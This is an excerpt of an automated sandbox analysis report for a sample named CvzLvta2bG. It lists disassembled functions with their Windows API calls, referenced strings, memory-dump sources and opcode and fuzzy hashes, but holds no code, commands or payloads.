Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a36b2be3ec9fe9a0b4ed2e102b7981a8cfb5a51a3a4957ef66d120c007cbb6a6
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 23B0927744020CB7CE012A82FC02A593B699B41764F408020FB0C281B2A673A6649A89

Function 0157F15C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0157F171

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: f82d6070a8f6b5ae0fbe1e9234d0e328c9713548c22a650de581ca05e563cfcd
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: B7E09A7494020DAFDB00EFA4E64969E7BB4EF05311F1006A1FD05D7681DA309A548A62

Function 0157F160 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0157F171

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 10644fa4e0cd6a3f8c95137faf46f825d20188e8329d555ea589315e6ab26977
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 1CE0E67494020DEFDB00EFB4E64969E7FB4FF04301F100261FD01D2281D6309D50CA62

Non-executed Functions

Function 00E8CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CB95
GetWindowLongW.USER32(?,000000F0), ref: 00E8CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CC00
SendMessageW.USER32 ref: 00E8CC29
_wcsncpy.LIBCMT ref: 00E8CC95
GetKeyState.USER32(00000011), ref: 00E8CCB6
GetKeyState.USER32(00000009), ref: 00E8CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CCD9
GetKeyState.USER32(00000010), ref: 00E8CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CD0C
SendMessageW.USER32 ref: 00E8CD33
SendMessageW.USER32(?,00001030,?,00E8B348), ref: 00E8CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8CE60
SetCapture.USER32(?), ref: 00E8CE69
ClientToScreen.USER32(?,?), ref: 00E8CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8CEF5
ReleaseCapture.USER32 ref: 00E8CF00
GetCursorPos.USER32(?), ref: 00E8CF3A
ScreenToClient.USER32(?,?), ref: 00E8CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8CFA3
SendMessageW.USER32 ref: 00E8CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D00E
SendMessageW.USER32 ref: 00E8D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D06D
GetCursorPos.USER32(?), ref: 00E8D08D
ScreenToClient.USER32(?,?), ref: 00E8D09A
GetParent.USER32(?), ref: 00E8D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D123
SendMessageW.USER32 ref: 00E8D154
ClientToScreen.USER32(?,?), ref: 00E8D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D20C
SendMessageW.USER32 ref: 00E8D22F
ClientToScreen.USER32(?,?), ref: 00E8D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D2B5

Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC

GetWindowLongW.USER32(?,000000F0), ref: 00E8D351

Strings

pb, xrefs: 00E8CEAF
@GUI_DRAGID, xrefs: 00E8CE9C
F, xrefs: 00E8D235

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb
API String ID: 3977979337-96320988
Opcode ID: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
Instruction ID: 2d87dc60d2a6efa971fde584f257444e9b98c4e85885e6aca41c8a790c761ca9
Opcode Fuzzy Hash: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
Instruction Fuzzy Hash: 2042DE75204640AFC724EF25CC48EAABBE5FF49314F241A29F55DA72B0C731E884DBA1

Function 00E16F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E171C3
_memset.LIBCMT ref: 00E17539
_memmove.LIBCMT ref: 00E176AC

Strings

], xrefs: 00E51A22
DEFINE, xrefs: 00E52103
[:<:]], xrefs: 00E17479
P\, xrefs: 00E51AB8
_, xrefs: 00E523CB
[:>:]], xrefs: 00E17492
\b(?=\w), xrefs: 00E53769
\b(?<=\w), xrefs: 00E53773
3c, xrefs: 00E523A0
Q\E, xrefs: 00E17FCB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]$3c$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
API String ID: 1357608183-1767882695
Opcode ID: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
Instruction ID: e1fbcf9b3574e49614b32ce47e45b54c97df66737a5eeb5fde4235c3d99795a0
Opcode Fuzzy Hash: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
Instruction Fuzzy Hash: 4293CF71A00219DBDB24CFA8C881BEDB7B1FF48715F24956AED45BB280E7709E85CB40

Function 00E048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00E048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D665
IsIconic.USER32(?), ref: 00E3D66E
ShowWindow.USER32(?,00000009), ref: 00E3D67B
SetForegroundWindow.USER32(?), ref: 00E3D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E3D69B
GetCurrentThreadId.KERNEL32 ref: 00E3D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00E3D6CF
SetForegroundWindow.USER32(?), ref: 00E3D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6E7
keybd_event.USER32(00000012,00000000), ref: 00E3D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6FC
keybd_event.USER32(00000012,00000000), ref: 00E3D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D70A
keybd_event.USER32(00000012,00000000), ref: 00E3D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D719
keybd_event.USER32(00000012,00000000), ref: 00E3D71E
SetForegroundWindow.USER32(?), ref: 00E3D721
AttachThreadInput.USER32(?,?,00000000), ref: 00E3D748

Strings

Shell_TrayWnd, xrefs: 00E3D660

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
Instruction ID: 78e8d652569431a300af5f9a664de7c9e010644c3e1f7b1fea71e7a3d02040de
Opcode Fuzzy Hash: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
Instruction Fuzzy Hash: 2C315371A40318BEEB216B629C49F7F7E6CEB44B50F104026FA08FA1D1D6B05D51EBA1

Function 00E58310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865

_memset.LIBCMT ref: 00E58353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E583A5
CloseHandle.KERNEL32(?), ref: 00E583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E583CD
GetProcessWindowStation.USER32 ref: 00E583E6
SetProcessWindowStation.USER32(00000000), ref: 00E583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E5840A

Part of subcall function 00E581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
Part of subcall function 00E581CB: CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2

Strings

default, xrefs: 00E58405
, xrefs: 00E58362
winsta0, xrefs: 00E583C8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2b022fdfec2d1abba1f55c2402af8fcb426df7e159a7ea8192e0cf89fac4ec9b
Instruction ID: 9d0389cb158623c2b5a777982d81f11258f99a295e31df1f5942fa285645223f
Opcode Fuzzy Hash: 2b022fdfec2d1abba1f55c2402af8fcb426df7e159a7ea8192e0cf89fac4ec9b
Instruction Fuzzy Hash: F1818B71800209AFDF119FA5DE45AEE7BB8FF08309F146569FD14B6261EB318E18DB60

Function 00E6C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E6C78D
FindClose.KERNEL32(00000000), ref: 00E6C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6C844
__swprintf.LIBCMT ref: 00E6C890
__swprintf.LIBCMT ref: 00E6C8D3

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

__swprintf.LIBCMT ref: 00E6C927

Part of subcall function 00E23698: __woutput_l.LIBCMT ref: 00E236F1

__swprintf.LIBCMT ref: 00E6C975

Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E23713
Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E2372B

__swprintf.LIBCMT ref: 00E6C9C4
__swprintf.LIBCMT ref: 00E6CA13
__swprintf.LIBCMT ref: 00E6CA62

Strings

%4d, xrefs: 00E6C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00E6C88A
%02d, xrefs: 00E6C91B, 00E6C925, 00E6C973, 00E6C9C2, 00E6CA11, 00E6CA60

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
Instruction ID: 8ed1055cec48469b0dc0e743bed3c2eafc48dcb129af436ed61f5efff3843b94
Opcode Fuzzy Hash: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
Instruction Fuzzy Hash: 77A14EB1408304AFC714EFA4D885DAFB7ECFF94704F405919F595A7192EA34EA48CB62

Function 00E6EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00E6EFB6
_wcscmp.LIBCMT ref: 00E6EFCB
_wcscmp.LIBCMT ref: 00E6EFE2
GetFileAttributesW.KERNEL32(?), ref: 00E6EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00E6F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00E6F026
FindClose.KERNEL32(00000000), ref: 00E6F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F04D
_wcscmp.LIBCMT ref: 00E6F074
_wcscmp.LIBCMT ref: 00E6F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F09D
SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F0C5
FindClose.KERNEL32(00000000), ref: 00E6F0D2
FindClose.KERNEL32(00000000), ref: 00E6F0E4

Strings

*.*, xrefs: 00E6F048

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
Instruction ID: a08caa539672842f1df0d5c4096a28a70d75f7615f88aaec5fc0738a4a5457d2
Opcode Fuzzy Hash: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
Instruction Fuzzy Hash: 5431C0325412196EDB14EFB5FC59AEE77AC9F483A4F101176E808F21A1DB70DA84CB61

Function 00E80857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8F910,00000000,?,00000000,?,?), ref: 00E809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E80A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E80A92
RegCloseKey.ADVAPI32(?), ref: 00E80DB2
RegCloseKey.ADVAPI32(00000000), ref: 00E80DBF

Strings

REG_BINARY, xrefs: 00E80D4D
REG_EXPAND_SZ, xrefs: 00E80A2F
REG_QWORD, xrefs: 00E80D00
REG_SZ, xrefs: 00E80AD0
REG_DWORD, xrefs: 00E80C83
REG_MULTI_SZ, xrefs: 00E80B7A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 89135286e2702d00c6af94c52cb7cee553ed86749a03f79c927069a554da0923
Instruction ID: d50a94de333f4a8f155b5dc304ca1e911a27d4fe37dd1046de9a343c1b176aa8
Opcode Fuzzy Hash: 89135286e2702d00c6af94c52cb7cee553ed86749a03f79c927069a554da0923
Instruction Fuzzy Hash: AA027C756006119FCB54EF24D841E2AB7E5FF89324F04985CF99AAB3A2CB30EC45CB91

Function 00E166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

pG, xrefs: 00E16751
ANYCRLF), xrefs: 00E512FB
ANY), xrefs: 00E512DE
CR), xrefs: 00E51287
_, xrefs: 00E51465, 00E5150C, 00E515B4
UCP), xrefs: 00E5110D
LF), xrefs: 00E512A4
BSR_ANYCRLF), xrefs: 00E5131E
CRLF), xrefs: 00E512C1
LIMIT_MATCH=, xrefs: 00E51170
BSR_UNICODE), xrefs: 00E51338
NO_AUTO_POSSESS), xrefs: 00E5112E
UTF), xrefs: 00E510FA
UTF16), xrefs: 00E510CF
0F, xrefs: 00E16747
LIMIT_RECURSION=, xrefs: 00E511FC
0D, xrefs: 00E16733
NO_START_OPT), xrefs: 00E5114F
0E, xrefs: 00E1673D
3c, xrefs: 00E168FF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID: 0D$0E$0F$3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG$_
API String ID: 0-821810444
Opcode ID: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
Instruction ID: 0aa15cad3053ce6165c6327799c55ca489ce9b28a982aeaaacc10cae20ec36f1
Opcode Fuzzy Hash: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
Instruction Fuzzy Hash: 9D728F75E00219DBDB14CF59C890BEEB7B5FF48314F1495AAE809FB290E7709A85CB90

Function 00E6F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00E6F113
_wcscmp.LIBCMT ref: 00E6F128
_wcscmp.LIBCMT ref: 00E6F13F

Part of subcall function 00E64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E643A0

FindNextFileW.KERNEL32(00000000,?), ref: 00E6F16E
FindClose.KERNEL32(00000000), ref: 00E6F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F195
_wcscmp.LIBCMT ref: 00E6F1BC
_wcscmp.LIBCMT ref: 00E6F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F1E5
SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F20D
FindClose.KERNEL32(00000000), ref: 00E6F21A
FindClose.KERNEL32(00000000), ref: 00E6F22C

Strings

*.*, xrefs: 00E6F190

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
Instruction ID: 264b525abbb2aef1e916bac3eb9cfe44abfe06b1b31b155a1d2abc8d9fe7998b
Opcode Fuzzy Hash: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
Instruction Fuzzy Hash: CB31E0365812196ADB20AEA4FC58AEE77AC9F853A4F101171E808F21A1DB30DE45CF64

Function 00E6A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A20F
__swprintf.LIBCMT ref: 00E6A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A293
_memset.LIBCMT ref: 00E6A2B2
_wcsncpy.LIBCMT ref: 00E6A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A323
CloseHandle.KERNEL32(00000000), ref: 00E6A32E
RemoveDirectoryW.KERNEL32(?), ref: 00E6A337
CloseHandle.KERNEL32(00000000), ref: 00E6A341

Strings

\, xrefs: 00E6A247
:, xrefs: 00E6A252
\??\%s, xrefs: 00E6A22B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
Instruction ID: fdc484e7dd26daf04d697358090c2161eac57039da626d9562bfa0805e08e1ee
Opcode Fuzzy Hash: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
Instruction Fuzzy Hash: 5031C0B1940109ABDB20DFA1EC49FEB37BCEF88745F1451B6F508F2160EB7096448B25

Function 00E57CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
Part of subcall function 00E58202: GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
Part of subcall function 00E58202: GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
Part of subcall function 00E58202: HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255

Part of subcall function 00E5829F: GetProcessHeap.KERNEL32(00000008,00E57CF8,00000000,00000000,?,00E57CF8,?), ref: 00E582AB
Part of subcall function 00E5829F: HeapAlloc.KERNEL32(00000000,?,00E57CF8,?), ref: 00E582B2
Part of subcall function 00E5829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E57CF8,?), ref: 00E582C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E57D13
_memset.LIBCMT ref: 00E57D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E57D47
GetLengthSid.ADVAPI32(?), ref: 00E57D58
